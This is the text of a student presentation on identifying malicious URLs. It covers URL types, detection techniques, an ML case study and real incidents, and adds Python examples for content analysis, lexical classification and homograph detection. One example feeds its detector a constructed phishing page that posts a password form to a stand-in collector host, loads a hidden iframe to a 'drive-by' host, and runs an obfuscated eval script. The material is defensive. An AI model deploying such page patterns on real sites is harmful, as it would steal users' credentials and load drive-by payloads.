Case Study of Identifying Malicious URLs
Presented by S. Chandrika & M. Mythri
INTRODUCTION

What is a malicious URL?
A malicious URL is a link created with the purpose of promoting scams, attacks, and frauds.

The Importance of Detecting Malicious URLs
1. Protecting Sensitive Information
2. Preventing Malware Infections
3. Enhancing User Trust
4. Mitigating Financial Losses
5. Staying Ahead of Evolving Threats

HOW TO PROTECT THE DATA?
• Use Security Software
• Enable Browser Security Features
• Use URL Scanners
• Enable Multi-Factor Authentication (MFA)
TYPES OF MALICIOUS URLS
• Phishing URLs
• Typosquatting URLs
• Malware URLs
• Lookalike Domains
• Command and Control (C&C) URLs
• Drive-by Download URLs
WAYS TO DETECT MALICIOUS URLS

1. Malicious URL Detection Using Machine Learning:
Malicious URLs pose a significant threat to cybersecurity, leading to
phishing attacks, malware distribution, and other malicious activities.
Traditional methods like blacklisting are often insufficient due to their
inability to detect newly generated malicious URLs.
Methodology
1.Data Collection: A large dataset of URLs, both benign and
malicious, was collected. Features such as domain registration details,
host properties, and lexical characteristics of the URLs were extracted.
2.Feature Extraction: Over 30,000 features were extracted from the
URLs, including information from blacklists, domain registration details,
host properties, and lexical features.
3.Model Training: Machine learning classifiers such as Logistic
Regression with L1 regularization were used to classify URLs. The
model was trained to distinguish between benign and malicious URLs
based on the extracted features.
4.Evaluation: The model’s performance was evaluated using metrics
like accuracy, precision, recall, and F1-score.
The Logistic Regression model achieved an accuracy of over 86.5%.
Results
The machine learning approach demonstrated high accuracy in
detecting malicious URLs, significantly outperforming traditional
blacklisting methods. The study highlighted the importance of using a
diverse set of features to improve detection rates.
Conclusion
This case study illustrates the effectiveness of machine learning
techniques in enhancing cybersecurity measures by accurately
detecting malicious URLs. The approach can be further improved by
incorporating more advanced models and real-time data collection
methods.
Detecting malicious URLs often involves using various machine learning algorithms. Here are some commonly used ones:

1. Logistic Regression: This algorithm is used for binary classification problems and can effectively distinguish between malicious and benign URLs based on features extracted from the URLs.
2. Decision Trees and Random Forests: A random forest builds many decision trees and merges their votes to get a more accurate and stable prediction than a single tree.
3. Support Vector Machines (SVM): SVMs are effective in high-dimensional spaces and are used to classify URLs by finding the hyperplane that best separates the data into different classes.
4. Naive Bayes: This probabilistic classifier is based on Bayes' theorem and is particularly useful for text classification tasks, such as analyzing the content of URLs.
5. K-Nearest Neighbors (KNN): This algorithm classifies URLs based on the majority class among the k nearest neighbors in the feature space.
Techniques for Identifying Malicious URLs
1. Blacklisting
•Description: This technique involves maintaining a list of known malicious URLs. When a URL is accessed, it is checked against this list.
•Pros: Simple and effective for known threats.
•Cons: Ineffective against new or unknown malicious URLs.

2. Heuristic Analysis
•Description: This method analyzes the URL structure and behavior to identify suspicious patterns. For example, URLs with excessive special characters or unusual domain names might be flagged.
•Pros: Can detect new threats based on patterns.
•Cons: May produce false positives.

3. Machine Learning
•Description: Machine learning models are trained to recognize features of malicious URLs. These models can then predict whether a new URL is malicious based on its characteristics.
•Pros: Highly effective and adaptable to new threats.
•Cons: Requires a large dataset and computational resources for training.

4. Lexical Analysis
•Description: This technique examines the URL’s text, such as length, use of special characters, and suspicious keywords.
•Pros: Quick and easy to implement.
•Cons: May not be sufficient on its own.

5. Content-Based Analysis
•Description: This involves analyzing the content of the webpage that the URL points to. Techniques include checking for malicious scripts, unusual redirects, and phishing content.
•Pros: Directly examines the threat.
•Cons: Requires fetching and analyzing the webpage content, which can be resource-intensive.

6. Hybrid Approaches
•Description: Combining multiple techniques to improve detection accuracy. For example, using both lexical and host-based analysis.
•Pros: Higher accuracy and robustness.
•Cons: More complex to implement and maintain.
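Content-based analysis (technique 5) is the one that needs the most code, so here is an added worked example, not taken from the slides, that runs the checks the slide names over a constructed HTML page: a meta-refresh redirect to another domain, an externally hosted script, a login form that posts the password to a different site, a hidden iframe, and an obfuscated inline script. The sample URL, hostnames and HTML are made up; the registrable() helper approximates the registrable domain with the last two labels, which is an assumption that real code should replace with the Public Suffix List.

```python
"""Content-based analysis of a page's HTML (added example; all inputs constructed)."""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Assumption: approximate the registrable domain with the last two labels.
# Real code should use the Public Suffix List (bbc.co.uk would break this).
def registrable(host):
    parts = host.lower().split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()

# Patterns that commonly appear in obfuscated drive-by loaders.
OBFUSCATION = re.compile(r"eval\s*\(|unescape\s*\(|String\.fromCharCode|document\.write\s*\(")

class PageAnalyzer(HTMLParser):
    """One pass over the HTML; collects indicators of phishing or drive-by content."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.site = registrable(urlparse(page_url).hostname or "")
        self.findings = []
        self._in_script, self._script = False, []
        self._form_action, self._form_has_password = None, False

    def _host_of(self, link):
        return urlparse(urljoin(self.page_url, link)).hostname or ""

    def _foreign(self, link):
        host = self._host_of(link)
        return bool(host) and registrable(host) != self.site

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self._in_script = True
            if a.get("src") and self._foreign(a["src"]):
                self.findings.append("external script from " + self._host_of(a["src"]))
        elif tag == "form":
            self._form_action, self._form_has_password = a.get("action", ""), False
        elif tag == "input" and a.get("type", "").lower() == "password":
            self._form_has_password = True
        elif tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            if (a.get("width") == "0" or a.get("height") == "0"
                    or "display:none" in style or "visibility:hidden" in style):
                self.findings.append("hidden iframe to " + a.get("src", "?"))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = re.search(r"url\s*=\s*(\S+)", a.get("content", ""), re.I)
            if m and self._foreign(m.group(1)):
                self.findings.append("meta refresh redirect to " + m.group(1))

    def handle_data(self, data):
        if self._in_script:          # HTMLParser hands script bodies to handle_data
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
            code, self._script = "".join(self._script), []
            if OBFUSCATION.search(code):
                self.findings.append("obfuscated inline script (eval/unescape/fromCharCode)")
        elif tag == "form":
            if self._form_has_password and self._form_action and self._foreign(self._form_action):
                self.findings.append("password form posts to foreign host "
                                     + self._host_of(self._form_action))
            self._form_action = None

def analyze_page(page_url, html):
    """Return the list of findings for a page fetched from page_url (empty = nothing seen)."""
    p = PageAnalyzer(page_url)
    p.feed(html)
    p.close()
    return p.findings

# Constructed sample: a phishing page that also drops a drive-by iframe.
SAMPLE_URL = "http://secure-login.example.com/index.html"
SAMPLE_HTML = """<html><head>
<meta http-equiv="refresh" content="5; url=http://collector.example.net/next">
<script src="http://cdn.attacker.example.org/x.js"></script>
</head><body>
<form action="http://collector.example.net/post.php" method="post">
  <input name="user"><input type="password" name="pass"><input type="submit">
</form>
<iframe src="http://drive-by.example.org/exploit" width="0" height="0"></iframe>
<script>eval(unescape("%61%6c%65%72%74%28%31%29"));</script>
</body></html>"""

if __name__ == "__main__":
    for finding in analyze_page(SAMPLE_URL, SAMPLE_HTML):
        print("-", finding)
```

In practice the HTML is fetched in a sandboxed client (the slide's "resource-intensive" caveat also covers the risk of executing the page), and the findings feed the hybrid scoring of technique 6 rather than acting as a verdict on their own: a legitimate site that posts a login form to its SSO provider on another domain will trip the form check, so each finding is a weighted signal, not a block.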
FEATURES USED IN DETECTION

Lexical Features:
• URL Length: Longer URLs can be suspicious.
• Special Characters: Presence of unusual characters like @, %, or multiple //.
• Keyword Analysis: Use of misleading or suspicious keywords (e.g., "login", "secure").

Host-Based Features:
• Domain Age: Newly registered domains can be more suspicious.
• WHOIS Information: Details about the domain's registration.
• IP Address: Reputation and geolocation of the IP address.

Content-Based Features:
• HTML Content: Analysis of the webpage's HTML for malicious scripts.
• Redirects: Unusual or multiple redirects can indicate phishing.
• Embedded Links: Presence of suspicious links within the content.

Machine Learning Features:
• Feature Engineering: Creating new features from existing data to improve model performance.
• Model Training: Using labeled datasets to train models to recognize malicious URLs.
• Anomaly Detection: Identifying URLs that deviate from normal patterns.
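The lexical features listed above and the L1-regularised logistic regression from the case study slide fit together in one short pipeline, so here is an added example (not the slides' own code, and not the 30,000-feature model of the cited study) that extracts nine lexical features from a URL and trains a logistic regression with an L1 penalty in pure Python. The training URLs, the keyword list and the RISKY_TLDS set are constructed for the demonstration; host-based features such as domain age need WHOIS or DNS lookups and are left out so the block runs offline.

```python
"""Lexical URL features + L1-regularised logistic regression (added example, pure Python).
The URLs below are made up and the feature set is a small subset of a real classifier's."""
import math
import re
from urllib.parse import unquote, urlparse

SUSPICIOUS_WORDS = ("login", "signin", "secure", "verify", "update", "account", "bank")
RISKY_TLDS = {"tk", "xyz", "top", "info", "zip"}  # assumption: illustrative list only
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
FEATURE_NAMES = ["length/100", "host_dots", "host_hyphens", "userinfo_at",
                 "percent_escapes", "ip_host", "keywords", "double_slash_path", "risky_tld"]

def extract_features(url):
    """Map one URL to a fixed-length numeric vector (lexical features only)."""
    p = urlparse(url)
    host = (p.hostname or "").lower()
    tld = host.rsplit(".", 1)[-1] if "." in host else ""
    decoded = unquote(url).lower()            # match keywords after %xx decoding
    return [
        len(url) / 100.0,
        float(host.count(".")),
        float(host.count("-")),
        1.0 if "@" in p.netloc else 0.0,      # user@host trick hides the real host
        float(url.count("%")),
        1.0 if IPV4.match(host) else 0.0,
        float(sum(decoded.count(w) for w in SUSPICIOUS_WORDS)),
        1.0 if "//" in p.path else 0.0,
        1.0 if tld in RISKY_TLDS else 0.0,
    ]

def _sigmoid(z):
    z = max(-500.0, min(500.0, z))
    return 1.0 / (1.0 + math.exp(-z))

def train_l1_logreg(X, y, lr=0.3, lam=0.005, epochs=3000):
    """Batch gradient descent with a proximal (soft-threshold) step for the L1 penalty."""
    n, d = len(X), len(X[0])
    w, b = [0.0] * d, 0.0
    for _ in range(epochs):
        gw, gb = [0.0] * d, 0.0
        for xi, yi in zip(X, y):
            err = _sigmoid(b + sum(wj * xj for wj, xj in zip(w, xi))) - yi
            gb += err
            for j in range(d):
                gw[j] += err * xi[j]
        b -= lr * gb / n                      # bias is not regularised
        for j in range(d):
            w[j] -= lr * gw[j] / n
            w[j] = math.copysign(max(abs(w[j]) - lr * lam, 0.0), w[j])  # L1 shrinkage
    return w, b

def score(model, url):
    """Probability that url is malicious under the trained model."""
    w, b = model
    return _sigmoid(b + sum(wj * xj for wj, xj in zip(w, extract_features(url))))

def nonzero_weights(model):
    """L1 drives useless weights to exactly zero; this shows which features survived."""
    return {n: round(wj, 3) for n, wj in zip(FEATURE_NAMES, model[0]) if wj != 0.0}

# Constructed training set (not real telemetry): label 1 = malicious, 0 = benign.
TRAINING = [
    ("https://www.google.com/search?q=test", 0),
    ("https://github.com/python/cpython", 0),
    ("https://en.wikipedia.org/wiki/URL", 0),
    ("https://docs.python.org/3/library/urllib.parse.html", 0),
    ("https://www.bbc.co.uk/news", 0),
    ("https://accounts.google.com/signin", 0),
    ("http://192.168.1.10/login/verify.php", 1),
    ("http://secure-login-paypal.com.evil.net/account/update", 1),
    ("http://paypal.com@phish.example/login", 1),
    ("http://bank-secure-verify.xyz/%61%63%63ount/login", 1),
    ("http://update-your-account.info//secure/login", 1),
    ("https://www.micros0ft-support.tk/verify?user=bob", 1),
]

def build_demo_model():
    X = [extract_features(u) for u, _ in TRAINING]
    y = [float(lbl) for _, lbl in TRAINING]
    return train_l1_logreg(X, y)

if __name__ == "__main__":
    model = build_demo_model()
    print(nonzero_weights(model))
    for u in ("https://www.python.org/downloads/",
              "http://login-verify-secure.example-account.tk/update"):
        print(f"{score(model, u):.3f}  {u}")
```

Two details matter more than the model: keywords are counted after percent-decoding, because "%61%63%63ount" is "account" to the browser but not to a naive substring match, and the benign set deliberately includes accounts.google.com/signin, so the model cannot get away with "login-like word means phishing" and has to lean on the structural indicators (userinfo "@", IP hosts, hyphenated hosts, risky TLDs). With only twelve examples this is a teaching model; the cited study's 86.5% comes from a far larger dataset.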
HOW TO PREVENT THIS?
Preventing malicious emails, spam, and URLs involves a combination of best practices, tools, and awareness. Here are some effective strategies:

1. Use Email Filters and Spam Protection
•Email Filters: Most email services like Gmail and Outlook have built-in spam filters. Ensure
these are enabled and configured correctly.
•Report Spam: Regularly report spam emails to help improve the filter’s accuracy.
•Block Senders: Block email addresses that frequently send spam.
2. Be Cautious with Links and Attachments
•Hover Over Links: Before clicking, hover over links to see the actual URL. Look for suspicious
or unfamiliar domains.
•Avoid Unknown Attachments: Do not open attachments from unknown or unexpected
sources.
3. Enable Multi-Factor Authentication (MFA)
•MFA: Use multi-factor authentication for your email and other online accounts to add an extra
layer of security.
4. Keep Software Updated
•Regular Updates: Ensure your operating system, browsers, and security software are up to
date to protect against known vulnerabilities.
5. Use Security Software
•Antivirus Programs: Install and regularly update antivirus and anti-malware software.
•Browser Extensions: Use browser extensions that warn you about malicious websites, such as
those provided by Google Safe Browsing or similar services.
6. Educate Yourself and Others
•Phishing Awareness: Learn to recognize phishing attempts. Look for red flags like urgent
requests, unfamiliar senders, and poor grammar.
•Training: Participate in or provide cybersecurity training to stay informed about the latest
threats.
7. Use Strong, Unique Passwords
•Password Managers: Use a password manager to generate and store strong, unique
passwords for each of your accounts.
CASE STUDY ANALYSIS
REAL-WORLD EXAMPLES OF MALICIOUS URL ATTACKS & HOW THEY WERE DETECTED
1. TikTok CSRF Attack
Attack: In 2020, a vulnerability was disclosed in TikTok (owned by ByteDance) that allowed attackers to send users messages containing malicious links. Following such a link could trigger Cross-Site Request Forgery (CSRF) or Cross-Site Scripting (XSS) attacks, causing other users' accounts to submit requests on the attacker's behalf.
Detection: The vulnerability was reported by security researchers who noticed unusual behavior and traffic patterns. TikTok's security team then analyzed the reports and patched the vulnerability within three weeks.
2. SolarWinds Supply Chain Attack
Attack: In December 2020, it was revealed that the software company SolarWinds had been targeted in a supply chain attack. Attackers implanted malicious code into an update of the company's network management software, affecting several US government agencies and numerous private companies.
Detection: The attack was detected by cybersecurity firm
FireEye, which noticed unusual activity in its own network. Further
investigation revealed the compromised SolarWinds software
update, leading to a broader investigation and response.
3. Twitter Spear Phishing Attack
Attack: In July 2020, Twitter experienced a major security breach where attackers used spear phishing techniques to gain access to internal tools. They then posted tweets from high-profile accounts, promoting a cryptocurrency scam.
4. Zoom Credential Stuffing Attack
Attack: In early 2020, Zoom users were targeted in a credential stuffing
attack, where attackers used previously leaked credentials to gain
access to Zoom accounts.
Detection: The attack was detected through user reports of
unauthorized access and unusual login activity. Zoom’s security team
implemented additional security measures, including mandatory
password resets and two-factor authentication (2FA)
5.Google News Phishing Attack
Attack: In 2016, attackers used a URL that looked like “ɢoogle.news” instead
of “google.news” to trick users into thinking they were visiting the
legitimate Google News site. This type of attack, known as a homograph
attack, uses characters that look similar to those in the legitimate URL
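The homograph case above, together with the typosquatting and lookalike-domain types from the earlier slide, can be caught before a user ever sees the page by normalising the hostname and comparing it against a watch list. The following added example (not part of the presentation) decodes punycode back to Unicode, flags non-ASCII labels, collapses a small set of confusable characters to their ASCII lookalikes, and checks the result against protected domains by exact match and by edit distance. The CONFUSABLES table is a hand-picked subset of the Unicode confusables data and the PROTECTED list is a constructed watch list; both are assumptions for the demonstration.

```python
"""Lookalike-domain check: punycode, confusable skeletons and edit distance (added example)."""
import unicodedata

# Assumption: a tiny subset of the Unicode confusables table, enough for the example.
CONFUSABLES = {
    "\u0262": "g",  # LATIN LETTER SMALL CAPITAL G, the character in the Google News case
    "\u0430": "a", "\u043e": "o", "\u0435": "e", "\u0440": "p", "\u0441": "c",  # Cyrillic
    "\u0455": "s", "\u0456": "i", "\u0501": "d", "\u04bb": "h",
    "0": "o", "1": "l", "\u0131": "i", "\u0237": "j",
}
# Assumption: the organisation's watch list of domains worth protecting.
PROTECTED = ("google.news", "paypal.com", "microsoft.com")

def to_unicode(host):
    """Turn an xn-- (punycode) host back into Unicode so lookalikes become visible."""
    try:
        return host.encode("ascii").decode("idna")
    except UnicodeError:
        return host   # already Unicode, or not valid IDNA: analyse as given

def skeleton(host):
    """NFKC-normalise, lowercase, then replace confusable characters with ASCII lookalikes."""
    s = unicodedata.normalize("NFKC", to_unicode(host)).lower()
    return "".join(CONFUSABLES.get(ch, ch) for ch in s)

def edit_distance(a, b):
    """Levenshtein distance; a distance of 1 between registrable domains is classic typosquatting."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def check_host(host, protected=PROTECTED):
    """Return the reasons a host looks like an impersonation (empty list = no match)."""
    uni = to_unicode(host.lower().rstrip("."))
    reasons = []
    if any(ord(ch) > 127 for ch in uni):
        try:
            ace = uni.encode("idna").decode("ascii")
        except UnicodeError:
            ace = "<not IDNA-encodable>"
        reasons.append("non-ASCII characters in hostname: " + ace)
    skel = skeleton(uni)
    for target in protected:
        if skel == target and uni != target:
            reasons.append("confusable with " + target)
        elif 0 < edit_distance(skel, target) <= 1:
            reasons.append("typosquat of " + target + " (edit distance 1)")
    return reasons

if __name__ == "__main__":
    for h in ("google.news", "\u0262oogle.news", "micros0ft.com", "paypall.com"):
        print(h, "->", check_host(h) or "ok")
```

The non-ASCII check is the cheap first line: browsers render "ɢoogle.news" but the wire form is always the xn-- label, so logging and blocking on the ACE form avoids being fooled by the rendering. The skeleton comparison is what actually ties the lookalike to a brand; the digit mappings ("0" to "o", "1" to "l") will also flag legitimate names that contain digits, so in production the match should raise a score rather than block outright.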
Thank You
ANY QUERIES?

ELURU COLLEGE OF ENGINEERING &
